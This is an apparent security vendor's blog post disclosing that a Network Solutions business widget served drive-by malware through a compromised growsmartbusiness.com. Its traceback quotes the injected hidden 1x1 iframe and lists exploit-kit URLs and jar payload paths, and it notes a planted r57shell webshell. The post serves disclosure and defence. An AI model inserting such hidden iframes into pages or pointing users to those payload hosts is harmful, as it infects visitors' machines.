SMCI widget and growsmartbusiness.com by Network Solutions still serving malware, part 1/3

by Wayne Huang, NightCola Lin, Chris Hsiao of Armorize.
(Please see follow-up post: More than 500,000 Network Solutions parked domains actively serving malware)
Screenshot 1

The beginning of this year saw mass Web hosting compromises across numerous hosting providers; thousands of websites were compromised via vulnerabilities in shared hosting providers and as a result, were serving malware. We thought eventually everything would be cleaned up and everyone's operations would be back to normal--but it seems that didn't happen... yet.

Recently a lot of our HackAlert customers are still flagged (by HackAlert) to be serving malware. We noticed a particular group of them today--those that have installed the "Small Business Success Index" widget by Network Solutions. There are two ways one can install the widget into one's website or blog--via the one-click installation script offered by Widgetbox (as seen in Screenshot 1 above), or by directly visiting Network Solution's growsmartbusiness.com (Screenshot 2 below).
Screenshot 2

We quickly registered a Google Blogger account and verified that whoever installed this widget, will be serving malware as of now. Although Widgetbox is only one website providing an installation script for this widget, this site alone has recorded 5,371 installations (yes that "1" is us) already (see Screenshot 1 above). This means more than five thousand sites may be affected.

Here are the steps we went through in our verification process. We first went to Widgetbox and clicked on the "Install Widget" button as seen in Screenshot 1. A popup showed us the javascript to embed, as well as one-click-install buttons for Facebook, Blogger, Twitter, iGoogle, WordPress, LinkedIn, my Yearbook, etc. Yikes:
Screenshot 3

We clicked on "Blogger" and it worked--our armorizetest blog now has the widget installed:
Screenshot 4

Clicking on "Edit" shows the widget's javascript code--it's loading the javascript from cnd.widgetserver.com:
Screenshot 5

Visiting our test blog now shows the widget:
Screenshot 6

And now, our blog is officially serving malware. Scanning this test blog with HackAlert shows that our blog is indeed serving malware now. Here's the traceback:

1. in http://armorizetest.blogspot.com,
<script type="text/javascript" src="http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js"></script><script type="text/javascript">if (WIDGETBOX) WIDGETBOX.renderWidget('68804a4e-6a5a-444c-b0d7-efdced64bee1');</script>

2. http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js,
if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"39866",urls:{runtimeBaseUrl:"http://widgetserver.com/syndication",...,markupRuntimeBaseUrl:"http://markup.widgetserver.com/syndication",...},

3. http://cdn.widgetserver.com/syndication/subscriber/Main.js?39866, code omitted

4. http://markup.widgetserver.com/syndication/get_widget.html?widget.appId=68804a4e-6a5a-444c-b0d7-efdced64bee1&widget.regId=390f0daf-4998-474c-b207-a6398f278681&widget.friendlyId=small-business-success-index&widget.name=Small%20Business%20Success%20Index&widget.token=0ed26d5a93c23a4c798d563608b7265d07481df40000012a67400851&widget.sid=2bf65a16514f760acc18c69a3420ad34&widget.vid=2bf65a16514f760acc18c69a3420ad34&widget.id=0&widget.location=http%3A%2F%2Farmorizetest.blogspot.com%2F&widget.timestamp=1281647662457&widget.serviceLevel=0&widget.provServiceLevel=1&widget.instServiceLevel=0&widget.width=160&widget.height=300&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.ua=mozilla%2F4.0%20%28compatible%3B%20msie%206.0%3B%20windows%20nt%205.1%3B%20sv1%29&widget.output=htmlcontent
<iframe style="" height="300px" frameborder="0" style="border:none;overflow:none;" width="180px" src="http://growsmartbusiness.com/widgets/widget.php"></iframe>

5. http://growsmartbusiness.com/widgets/widget.php,
...omitted...
<iframe frameborder=0 src="http://96.30.16.216:8037/exemple.com/" width=1 height=1 scrolling=no></iframe>

6. http://96.30.16.216:8037/exemple.com/, malicious code
7. http://96.30.16.216:8037/exemple.com/error.js.php, malicious code
8. http://208.86.153.68:8067/exemple.com/load.php?spl=mdac, malicious code
9. http://96.30.16.216:8037/exemple.com/?spl=2&br=MSIE&vers=6.0&s=, malicious code
10. http://96.30.16.216:8037/exemple.com/error.js.php, malicious code
11. http://96.30.16.216:8037/exemple.com/992.jar
12. http://96.30.16.216:8037/exemple.com/cbe.jar

Conclusion: what a quick way to make your blog, website, facebook, linkedin, all serving malware.

Googling a bit, we verified that the domain growsmallbusiness.com was definitely compromised and injected with a r57shell (webshell), which allowed the attacker easy manipulation of the site. Check this link.



In part 2, we'll detail the actual malware behavior.

Note: We received some questions so we'll answer here. If you are trying to analyze this malware, note that it's quite mean and implements the following behavior:
1. Serves to each IP only once
2. Blocks well-known drive-by download analysis services such as Wepawet and jsunpack. These won't be able to help you in this case--see Wepawet results and jsunpack results.

1 comments:

Nandhini M said...

Quite nice this article, gave me some great thoughts :)  www.paradox.co.in

Post a Comment